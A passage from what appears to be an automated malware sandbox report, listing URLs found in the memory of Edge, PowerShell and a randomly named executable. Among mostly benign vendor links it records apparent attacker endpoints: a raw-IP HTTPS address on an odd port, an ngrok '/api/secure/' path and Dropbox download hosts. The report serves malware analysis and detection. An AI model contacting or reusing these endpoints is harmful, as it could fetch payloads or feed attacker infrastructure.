                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                      Source: svchost.exe, 00000007.00000002.2562589476.000002ACDD000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                      Source: svchost.exe, 00000007.00000003.1461608335.000002ACDCD80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                      Source: powershell.exe, 00000004.00000002.1595037005.0000020590074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://permanently-removed.invalid/
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://permanently-removed.invalid/v1/accountcapabilities:batchGet
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.1571110372.000002058042B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54DA46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000004.00000002.1571110372.000002058042B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                      Source: 1061714629.exe, 1061714629.exe, 00000022.00000000.1885022235.0000000000628000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 00000022.00000000.1884738156.000000000053D000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.macromedia.com
                      Source: 1061714629.exe, 0000001F.00000002.1934052501.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 1061714629.exe, 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000000.1711603757.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 00000022.00000000.1884738156.000000000053D000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp
                      Source: fontdrvhost.exeString found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      Source: powershell.exe, 00000004.00000002.1598322164.00000205EE9F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1599840392.00000205EEC20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef
                      Source: powershell.exe, 00000004.00000002.1600292188.00000205EED20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1598322164.00000205EEAA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1598322164.00000205EE9F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1599840392.00000205EEC20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1600433064.00000205F0817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef-UseBa
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54DA03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54DA1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000004.00000002.1571110372.000002058042B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581CCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581F82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581468000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581F82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581468000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                      Source: msedge.exe, 00000006.00000002.1477905991.000001D86747B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com0y
                      Source: msedge.exe, 0000001C.00000002.1659148419.000002534E2A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com0yes
                      Source: msedge.exe, 00000006.00000002.1481079671.00002DF402594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://azureedge.net/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.edog.designerapp.osi.office.net/
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.int.designerapp.osi.office.net/
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                      Source: msedge.exe, 0000001C.00000002.1661368153.000021C400188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: msedge.exe, 00000006.00000002.1480015007.00002DF40221C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.1661368153.000021C400188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: msedge.exe, 00000006.00000002.1480015007.00002DF40221C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.1660712362.000021C400040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: powershell.exe, 00000004.00000002.1595037005.0000020590074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000004.00000002.1595037005.0000020590074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000004.00000002.1595037005.0000020590074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp-dogfood.azurewebsites.net/
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp-int.azurewebsites.net/
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net/
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net/n
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net/net//
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 